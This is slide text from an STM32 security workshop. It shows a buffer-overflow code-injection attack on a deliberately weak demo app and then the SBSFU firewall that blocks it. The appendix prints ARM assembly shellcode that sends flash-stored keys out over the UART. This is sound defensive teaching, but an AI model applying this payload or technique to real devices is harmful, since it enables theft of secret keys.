05-STM32 - Security - WS - Adding Protections
05-STM32 - Security - WS - Adding Protections
05 Adding protections
Adding protections hands-on
• Purpose :
• Experience a code injection attack
• Activate counter measure included in
SBSFU (Isolation) UART
• Hands-on scenario
• Experiment real code injection attack
• Activate firewall mechanism in SBSFU as
counter-measure
05-2
What is an inner attack?
• The principle is
• Exploit a software weakness
• Inject malicious code
• Example : the buffer overflow
• Send more data than expected
• Software does not check the limit (weakness/bug)
• Results in data can be written at unexpected location
• Impacts system behaviour
05-3
Simple example
05-4
Let’s build this weak code
Open
Build
Check
3
05-5
SBSFU security protection management
05-6
Open app_sfu.h from
STM32L476RG_NUCLEO_2_Images_SBSFU
05-7
Comment #define using Toggle Comment
2
05-8
Block commented
To Double click
uncomment to get code
manually snippet &
copy paste
app_sfu.h
WARNING ! CTRL-S
Save file after modification !
05-10
Rebuild SBSFU
2
3
05-11
Launch postbuild script
• 03_01_Postbuild_SimpleApp_WithWeakness.bat
• To combine SBSFU, UserApp_WithWeakness and header
05-12
Update the target
• 00_ResetL4Target.bat
• 03_02_Flash_SBSFU_SimpleApp_WithWeakness.bat
05-13
Restart the board
05-14
Check application is working
05-15
Now everything is ready !
05-16
Send hack.bin to target
3
Go to :
C:\STM32SecuWS\L4\STM32L476_SimpleApp_WithWeakness
4
5
05-17
Attack performed!
05-19
Conclusion
05-20
How SBSFU addresses Isolation
05-21
SBSFU protection on STM32L4
SBSFU SBSFU
Code & constants Vdata/Stack/Heap
---
Active image Legend
Download Image header Vdata/Stack/Heap
DAP
DAP WRP + MPU-RX
Download Image
FWALL (code) + WRP + MPU-RX
Active image header
FWALL (code) + WRP + PCROP + MPU-RX
05-22
Activate firewall
1
Uncomment Firewall activation
CTRL-S
05-23
Rebuild SBSFU
2
05-24
Use scripts to prepare and flash the board
05-25
Perform the attack again
3
4
05-26
Result with FIREWALL
• SBSFU provides a framework for implementing your own specific action upon
detection of firewall reset
05-27
That’s all for this hands-on
05-28
Thank you !
Thank you
05-41
How the stack looks like in such case
End of stack (low addresses)
Available stack
05-42
How the attack can be performed ?
Remaining stack
Buffer[0]
Buffer[N-1]
R7
LR (return address) • The last word (LR) is the return address.
• Attacker can replace it with the address of the beginning of his
Stack from caller
assembly code
05-43
Example of assembly code for attack
Purpose of this code: read flash content and send it on UART
hack:
start:
CPSID I // disable interrupts
MOV R2, #0x441C // UART_ISR register address
MOVT R2, #0x4000
MOV R3, #0x03F0 // Flash address containing keys
MOVT R3, #0x0800
MOV R4, #256 // Number of bytes to read
send_byte:
LDRB R1, [R3], #1 // Read one byte in flash
STRB R1, [R2, #12] // Send byte to UART_TDR register
wait_complete:
LDR R6, [R2, #0] // Read UART ISR
ANDS R6, R6, #64 // Check End of Transmit flag
CMP R6, #0 // R6 is 0 if character not transmitted yet
BEQ.N wait_complete
SUB R4, R4, 1
CMP R4, #0
BNE send_byte // R6 different from 0, we can send next byte
NOP // NOP to be added to fit the exact buffer size
NOP
NOP 05-44
.end
From hack code to data injected
Content of
hack.bin